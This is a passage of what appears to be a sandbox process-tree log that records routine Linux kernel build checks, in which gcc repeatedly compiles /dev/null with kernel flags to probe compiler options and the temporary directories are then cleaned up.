/usr/local/bin/asas --64 -o /tmp/a/.tmp_1897/tmp /tmp/cct0Fs7L.s5⤵PID:1901
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1897/tmp /tmp/cct0Fs7L.s5⤵PID:1901
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1897/tmp /tmp/cct0Fs7L.s5⤵PID:1901
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18974⤵PID:1902
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=date-time\"; else echo \"\"; fi"3⤵PID:1903
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19034⤵PID:1904
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" -c -x c /dev/null -o /tmp/a/.tmp_1903/tmp4⤵
- Writes file to tmp directory
PID:1905 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1903/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cc9giDsh.s5⤵
- Writes file to tmp directory
PID:1906
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1903/tmp /tmp/cc9giDsh.s5⤵PID:1907
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1903/tmp /tmp/cc9giDsh.s5⤵PID:1907
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1903/tmp /tmp/cc9giDsh.s5⤵PID:1907
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1903/tmp /tmp/cc9giDsh.s5⤵PID:1907
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19034⤵PID:1908
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=incompatible-pointer-types\"; else echo \"\"; fi"3⤵PID:1909
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19094⤵PID:1910
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" -c -x c /dev/null -o /tmp/a/.tmp_1909/tmp4⤵PID:1911
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1909/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cc05EYeF.s5⤵PID:1912
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1909/tmp /tmp/cc05EYeF.s5⤵PID:1913
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1909/tmp /tmp/cc05EYeF.s5⤵PID:1913
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1909/tmp /tmp/cc05EYeF.s5⤵PID:1913
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1909/tmp /tmp/cc05EYeF.s5⤵PID:1913
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19094⤵PID:1914
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=designated-init\"; else echo \"\"; fi"3⤵PID:1915
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19154⤵PID:1916
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -c -x c /dev/null -o /tmp/a/.tmp_1915/tmp4⤵PID:1917
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1915/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccpssRFa.s5⤵PID:1918
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1915/tmp /tmp/ccpssRFa.s5⤵PID:1919
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1915/tmp /tmp/ccpssRFa.s5⤵PID:1919
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1915/tmp /tmp/ccpssRFa.s5⤵PID:1919
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1915/tmp /tmp/ccpssRFa.s5⤵
- Writes file to tmp directory
PID:1919
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19154⤵PID:1920
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmacro-prefix-map=./=\"; else echo \"\"; fi"3⤵PID:1921
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19214⤵PID:1922
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -c -x c /dev/null -o /tmp/a/.tmp_1921/tmp4⤵PID:1923
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1921/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccaoVyqB.s5⤵
- Writes file to tmp directory
PID:1924
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1921/tmp /tmp/ccaoVyqB.s5⤵PID:1925
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1921/tmp /tmp/ccaoVyqB.s5⤵PID:1925
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1921/tmp /tmp/ccaoVyqB.s5⤵PID:1925
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1921/tmp /tmp/ccaoVyqB.s5⤵PID:1925
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19214⤵PID:1926
-
-
-
